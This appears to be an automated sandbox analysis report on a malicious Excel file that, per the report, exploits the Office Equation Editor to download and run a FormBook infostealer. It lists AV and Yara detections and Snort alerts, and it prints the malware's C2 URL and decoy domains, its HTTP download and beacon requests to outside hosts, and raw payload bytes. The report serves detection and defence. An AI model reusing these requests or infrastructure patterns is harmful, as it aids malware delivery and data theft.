Analysis Report L2.xlsx

AV Detection:

Found malware configuration

Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe	Metadefender: Detection: 17%			Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe	Metadefender: Detection: 17%			Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: L2.xlsx	Virustotal: Detection: 30%			Perma Link
Source: L2.xlsx	ReversingLabs: Detection: 26%

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.vbc.exe.5b7268.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.0.control.exe.c20000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.vbc.exe.510000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.2557960.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.control.exe.5f2210.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.880000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.c20000.1.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, control.exe

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,		4_2_00405E61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_0040548B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,		4_2_0040263E

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		5_2_00406A9A
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		5_2_00415659
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		5_2_00415671
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi		7_2_00095659
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi		7_2_00095671
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx		7_2_00086A9B

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.alberthospice.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 192.210.173.40:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.alberthospice.com/sh2m/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe	DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe	DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe	DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe	DNS query: www.adultvideolife.xyz

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:06:46 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:52:54 GMTETag: "36dc6-5c46b6262be11"Accept-Ranges: bytesContent-Length: 224710Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1Host: www.alberthospice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /files/loader2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F87218.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /files/loader2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1Host: www.alberthospice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.alberthospice.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 06:08:17 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "6080f05e-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2168485351.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
